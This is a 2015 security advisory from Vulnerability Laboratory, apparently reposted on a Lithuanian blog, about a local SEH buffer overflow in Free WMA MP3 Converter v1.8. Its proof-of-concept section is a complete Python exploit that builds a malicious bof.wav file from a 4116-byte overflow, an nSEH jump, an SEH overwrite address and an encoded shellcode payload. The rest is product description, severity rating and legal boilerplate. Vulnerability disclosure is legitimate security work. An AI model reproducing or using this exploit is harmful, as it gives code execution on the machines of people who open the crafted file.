2015 m. gruodžio 1 d., antradienis

Free WMA MP3 Converter - Buffer Overflow Exploit (SEH)

Document Title:
===============
Free WMA MP3 Converter - Buffer Overflow Exploit (SEH)


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1620


Release Date:
=============
2015-10-19


Vulnerability Laboratory ID (VL-ID):
====================================
1620


Common Vulnerability Scoring System:
==============================
======
7.5


Product & Service Introduction:
===============================
Free WMA MP3 Converter is an free WMA to MP3 converter which helps you convert WMA to MP3, MP3 to WMA, WAV to MP3, WAV to WMA, MP3 to WAV, WMA to WAV etc.
Free WMA MP3 Converter provides optimized default settings. No more thinking but just a click to start WMA to MP3 conversion with the MP3 converter! In addition,
there are still a lot of settings can be set up to meet your special need. All the conversion process like convert WMA to MP3 and MP3 to WMA are fast and simple
with adjustable output quality. The audio converter supports ID3 tag, the ID3 tags in the original files can be reserved after conversion. Free download the Free
WMA MP3 Converter to enjoy your WMA and MP3 music anywhere and anytime!

(Copy of the Product Homepage: http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a buffer overflow vulnerability in the official Free WMA MP3 Converter v1.8 software.


Vulnerability Disclosure Timeline:
==================================
2015-10-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local buffer overflow (SEH) software vulnerability has been discovered in the official Free WMA MP3 Converter v1.8 software.
The vulnerability allows a local attacker to process the windows software by exploitation of a classic buffer overflow vulnerability.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5.
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the local
vulnerability results in system compromise by elevation of privileges via overwrite of the registers.


Proof of Concept (PoC):
=======================
#!/usr/bin/python
#Free WMA MP3 Converter - Buffer Overflow Exploit (SEH)
#Author : ZwX
#Download: http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
#Version : 1.8
#Tested Os : Windows 7
#Reference : https://www.milw00rm.com/exploits/1646
from struct import pack
buffer = "\x41" * 4116
nseh = "\xeb\x06\xff\xff"
seh = pack("<I", 0x401474)
shell=("\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35"
"\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e"
"\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63"
"\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63"
"\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65"
"\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68"
"\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42"
"\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55"
"\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51"
"\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47"
"\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55"
"\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75"
"\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34"
"\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65"
"\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d"
"\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62"
"\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37"
"\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c"
"\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31"
"\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53"
"\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55"
"\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56"
"\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49"
"\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59"
"\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45"
"\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36"
"\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77"
"\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33"
"\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41")

poc = buffer + nseh + seh + shell
file = open("bof.wav","w")
file.write(poc)
file.close()

print "POC Created by ZwX"
print " Email: msk4@live.fr"


Security Risk:
==============
The security risk of the local buffer overflow (SEH) Vulnerability in the converter software is estimated as high. (CVSS 7.5)


Credits & Authors:
==================
ZwX - (http://zwx.fr) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      -www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         -youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Komentarų nėra:

Rašyti komentarą